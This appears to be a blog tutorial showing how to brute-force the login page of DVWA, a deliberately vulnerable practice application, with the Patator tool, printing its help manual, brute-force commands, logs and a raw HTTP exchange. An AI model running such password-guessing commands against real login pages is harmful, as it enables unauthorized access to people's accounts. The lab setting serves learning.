Skip to main content

Use Patator To Brute Force DVWA login Page

Hello Friends,



Welcome Again To my Blog. In This Post, I'm going to post Another Usages Example of How To Use Patator Password Cracking Tool Against DVWA login Page As a practice exercise. so, that we can learn the usages of Patator.

Before Starting This Tutorial, I would like to share my opinion about Patator. And According To me, Patator is Awesome, Very Easy To Use, Smart, Good And Very Helpful Plus User Friendly. Want To Read More/Install it. Click here

Here, for This Tutorial Purpose I am using DVWA (Damn Vulnerable Web Application). For More Info,

How To Setup DVWA in Virutal Box
Setup DVWA in Windows




So, Let's Start With Quickly Setup of DVWA.


Now, Create A Folder And Open Your Terminal into That Folder.

Patator Help Main Menu

 
$ patator.py http-fuzz
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + rdp_gateway   : Brute-force RDP Gateway
  + ajp_fuzz      : Brute-force AJP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + rdp_login     : Brute-force RDP (NLA)
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward DNS lookup
  + dns_reverse   : Reverse DNS lookup
  + snmp_login    : Brute-force SNMP v1/2/3
  + ike_enum      : Enumerate IKE transforms
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module

Patator Http_Fuzz Module Help Manual

 
$ patator.py http_fuzz --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz  [global-options ...]

Examples:
  http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
  http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
  http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
  url           : target url (scheme://host[:port]/path?query)
  body          : body data
  header        : use custom headers
  method        : method to use [GET|POST|HEAD|...]
  raw_request   : load request from file
  scheme        : scheme [http|https]
  auto_urlencode: automatically perform URL-encoding [1|0]
  user_pass     : username and password for HTTP authentication (user:pass)
  auth_type     : type of HTTP authentication [basic | digest | ntlm]
  follow        : follow any Location redirect [0|1]
  max_follow    : redirection limit [5]
  accept_cookie : save received cookies to issue them in future requests [0|1]
  proxy         : proxy to use (host:port)
  proxy_type    : proxy type [http|socks4|socks4a|socks5]
  resolve       : hostname to IP address resolution to use (hostname:IP)
  ssl_cert      : client SSL certificate file (cert+key in PEM format)
  timeout_tcp   : seconds to wait for a TCP handshake [10]
  timeout       : seconds to wait for a HTTP response [20]
  before_urls   : comma-separated URLs to query before the main request
  before_header : use a custom header in the before_urls request
  before_egrep  : extract data from the before_urls response to place in the main request
  after_urls    : comma-separated URLs to query after the main request
  max_mem       : store no more than N bytes of request+response data in memory [-1 (unlimited)]
  persistent    : use persistent connections [1|0] 

Global options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Execution:
    -x arg              actions and conditions, see Syntax below
    --start=N           start from offset N in the wordlist product
    --stop=N            stop at offset N
    --resume=r1[,rN]*   resume previous run
    -e arg              encode everything between two tags, see Syntax below
    -C str              delimiter string in combo files (default is ':')
    -X str              delimiter string in conditions (default is ',')
    --allow-ignore-failures
                        failures cannot be ignored with -x (this is by design
                        to avoid false negatives) this option overrides this
                        behavior

  Optimization:
    --rate-limit=N      wait N seconds between each test (default is 0)
    --timeout=N         wait N seconds for a response before retrying payload
                        (default is 0)
    --max-retries=N     skip payload after N retries (default is 4) (-1 for
                        unlimited)
    -t N, --threads=N   number of threads (default is 10)

  Logging:
    -l DIR              save output and response data into DIR
    -L SFX              automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
                        (DIR defaults to '/tmp/patator')

  Debugging:
    -d, --debug         enable debug messages

Syntax:
 -x actions:conditions

    actions    := action[,action]*
    action     := "ignore" | "retry" | "free" | "quit" | "reset"
    conditions := condition=value[,condition=value]*
    condition  := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

    ignore      : do not report
    retry       : try payload again
    free        : dismiss future similar payloads
    quit        : terminate execution now
    reset       : close current connection in order to reconnect next time

    code        : match status code
    size        : match size (N or N-M or N- or -N)
    time        : match time (N or N-M or N- or -N)
    mesg        : match message
    fgrep       : search for string in mesg
    egrep       : search for regex in mesg
    clen        : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

 -e tag:encoding

    tag        := any unique string (eg. T@G or _@@_ or ...)
    encoding   := "unhex" | "sha1" | "b64" | "url" | "hex" | "md5"

    unhex       : decode from hexadecimal
    sha1        : hash in sha1
    b64         : encode in base64
    url         : url encode
    hex         : encode in hexadecimal
    md5         : hash in md5

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.


So, Let's Start with Demo Request:


$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301

Please Read Above Provide HTTP_FUZZ Module Manual To Understand The meaning of Parameters.
Actually, I sent that parameter just To Understand patator Parameter Concept.
Then, I Follow Below Steps To Make Things More Clear.

$ mkdir logs 
 
 
 
$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=password&Login=Login#' 0=../files/pass_filter -x quit:code=301 -l ./logs 
 
 
 
$ cat logs/RUNTIME.log 
$ http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body=username=admin&password=password&Login=Login# 0=../files/pass_filter -x quit:code=301 -l ./logs
00:33:47 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:33 IST
00:33:47 patator    INFO -                                                                              
00:33:47 patator    INFO - code size:clen       time | candidate                          |   num | mesg
00:33:47 patator    INFO - -----------------------------------------------------------------------------
00:33:47 patator    INFO - 302  501:0          0.006 |                                    |     1 | HTTP/1.1 302 Found
00:33:48 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s 
 
 
 
$ cat logs/RESULTS.csv 
time,level,code,size:clen,time,candidate,num,mesg
00:33:47,INFO,302,501:0,0.006,"",1,"HTTP/1.1 302 Found" 
 
 


Raw Request And Response Record

$ cat logs/1_302-501\:0-0.006.txt 
POST /login.php HTTP/1.1
Host: 192.168.43.131
User-Agent: Mozilla/5.0
Accept: */*
Content-Length: 47
Content-Type: application/x-www-form-urlencoded

username=admin&password=password&Login=Login%23

HTTP/1.1 302 Found
Date: Wed, 09 Jan 2019 19:03:01 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=falpigu76cuj0o3v0vmv3uu6f1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=high
Location: index.php
Content-Length: 0
Content-Type: text/html 
 
 

Well, After Examination Of Patator Generated Request And Server Response, here its my fine tune command
and its Output Also


$ patator.py http_fuzz url=http://192.168.43.131/login.php method=POST accept_cookie=1 before_urls= body='username=admin&password=FILE0&Login=Login#' 0=../files/pass_filter -x quit:fgrep='Location: index.php'
00:44:27 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-01-10 00:44 IST
00:44:27 patator    INFO -                                                                              
00:44:27 patator    INFO - code size:clen       time | candidate                          |   num | mesg
00:44:27 patator    INFO - -----------------------------------------------------------------------------
00:44:27 patator    INFO - 302  501:0          0.027 | password                           |     1 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.012 | passw0rd                           |     2 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.027 | passcode                           |    12 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.012 | passport                           |     3 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.005 | passions                           |     4 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.019 | passion1                           |     5 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.009 | pass1234                           |     6 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.024 | passward                           |    11 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.029 | passwoed                           |    22 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.041 | passion2                           |    13 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.033 | passion7                           |    14 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.024 | passwrod                           |    15 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  416:0          0.028 | passion8                           |    16 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.021 | passwort                           |     7 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.013 | passwerd                           |     8 | HTTP/1.1 302 Found
00:44:27 patator    INFO - 302  501:0          0.015 | passowrd                           |     9 | HTTP/1.1 302 Found
00:44:27 patator    INFO - Hits/Done/Skip/Fail/Size: 16/16/0/0/1055, Avg: 79 r/s, Time: 0h 0m 0s
00:44:27 patator    INFO - To resume execution, pass --resume 2,3,2,2,2,2,1,1,1,0



I Hope, This Heavy Data post Was Helpful for You To Understand How Patator Works.
Actually, During The Usage of Patator I Feel, Its Still Need Big Improvements.


Related Post

Top Visited

Create Simple Packet Sniffer Using Python

how to install burp suite in Linux/Ubuntu 16.04

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

Latest Google Dorks List

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

What is the use of Pseudo header in TCP/UDP packets?

how to configure burpsuite with firefox?

Python Beautiful Soup Module - Tutorial - Part 2

Create Ping Sweeping Script Using Python